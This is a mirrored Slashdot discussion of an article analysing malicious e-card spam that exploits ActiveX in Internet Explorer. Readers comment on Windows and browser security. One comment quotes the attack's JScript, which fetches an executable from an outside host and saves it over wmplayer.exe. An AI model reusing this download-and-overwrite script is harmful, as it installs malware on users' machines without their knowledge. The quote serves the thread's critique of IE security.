Slashdot Mirror


Malicious E-Cards - An Analysis of Spam

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."

10 of 482 comments (clear)

  1. The most frightening bit here by Rope_a_Dope · · Score: 5, Interesting

    ActiveX actually lets a webpage rewrite your wmplayer.exe file with its own version. If an Activex control can rewrite any executable on a Windows box, then I assume that any piece of the Windows kernel is vulnerable. This leads to a larger question, which is, "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?".

    1. Re:The most frightening bit here by CdBee · · Score: 5, Interesting

      "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

      (MSN) Chatrooms and Windowsupdate spring to mind as web-based uses of ActivX. Microsoft's decision to ship no Java Virtual Machine in Windows XP doesn't seem to have brought any more users into ActivX chatrooms though, I've seen chatroom moderators recommending users to download Mozilla :-)

      One extra worrying thing though, when you go into an MSN Groups chatroom with Mozilla on Windows, to install the ActivX control for the chatroom you have to install Microsoft ActivX Wrapper for Netscape

      Potentially, Mozilla users are now affected by ActivX insecurities if they accept this download.

      --
      I have been a user for about 10 years. This ends Feb 2014. The site's been ruined. I'm off. Dice, FU
    2. Re:The most frightening bit here by lordDallan · · Score: 5, Interesting

      The better question is why does Windows XP Home only have two user types, a totally crippled limited user (i.e. sh*t doesn't work half the time - so nobody uses it) or a full power, overwrite anything, viruses-be-damned administrator.

      Basically, by having only these two types of users (and not a happy compromise like Win 2K's "Power User"), Microsoft has virtually guaranteed that home users on their newest OS will remain vulnerable to exploits.

      If MS wants to do something really helpful to Windows security in their next Service Pack, they should add a "Power User" account type to Windows XP Home.

  2. Re:e-cards by toasted_calamari · · Score: 5, Interesting

    What really annoys me about e-cards is that even the legitimate ones look like spam, so much so that not only does the spam filter flag them, but I have trouble deciding if someone is being nice to me or trying to exploit my system.

    With regards to the article, thats definitly one of the nastiest browser exploits i've seen in a long time, makes me glad I don't use windows and IE.

  3. Re:You might remember me by ggvaidya · · Score: 5, Interesting
    ... "This time, I'm here to screw up your computer and install a virus! How about that? Let's get started ..."

    Why do the poor virus writers go through all this trouble anyways? Don't they know they can get 60% of the machines out there with just an e-mail with an attachment?

    Then again, nowadays a lot of attention is being focused on trojan horses. What about real viruses - something not even hackers can figure out easily? It can't be too hard to write a trojan horse which pretends to be a cool little game for a month or so - before deleting all your files. Can it?

  4. Re:It'd be scary if I ran my PC as Administrator.. by ggvaidya · · Score: 5, Interesting

    That's the point! There's no "crapware" - it's a simple file overwrite! If you're running as Admin..., you won't notice at all - your media player will just suddenly stop working.

  5. Using Mozilla on Windows won't protect you ... by Anonymous Coward · · Score: 5, Interesting
    wscript.exe can apparently be launched through Mozilla. Wscript.exe scripts can execute almost anything.

    I had FILEMON running (it monitors all disk i/o) and I navigated Mozilla to http://search.microsoft.com/ and entered a query in the second search textbox. Wscript.exe was fired up and it showed in FILEMON.

    My solution: I renamed wscript.exe and cscript.exe so they can't execute.

  6. Virus vs. Spam by the+grace+of+R'hllor · · Score: 5, Interesting

    Because Viruses can do better with some effort.

    MSBlaster is still going around. My own average from installing a base WinXP (and forgetting the Blaster fix and other updates) is about two minutes to being infected with the Blaster worm. A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

    E-mail just can't beat those times.

  7. Re:Ugly is what ugly does by JCMay · · Score: 5, Interesting

    What's sad is that Mozilla Firebird^H^H^H^Hfox now automatically launches certain files, just like IE. Clicking on a .doc, .xls, or .ppt file will automatically open an MS Office application. With all the problems with VB viruses it's unfortunate that Firefox makes this the default.


    There's a fundamental difference between starting an external viewer to view a downloaded file, and just executing the downloaded file. It's not the browser's fault that the external viewers have scripting languages that cause security issues, is it?

    There's nothing wrong with viewing something in Acrobat Reader. I appreciate that when I see articles in Word format that Firefox opens OpenOffice.org's swriter for me.

  8. Re:Are there really better alternatives??? by orthogonal · · Score: 5, Interesting
    The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure...?

    Fire{WHATEVER_WEEK_THIS_IS} doesn'tt, so far as I know do this:
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://adversting.co.uk/a.exe",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.

    No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!

    Go to web-site, get a new OS!

    And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop tho think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag?

    To the contrary, they considered it a positive feature! Why? Because Visual Basic "programers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".

    Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.

    I mean, Christ. This is just a travesty, and open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, bit I never knew javascript could be so bad.

    I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.

    Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.

    I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.

    What the hell?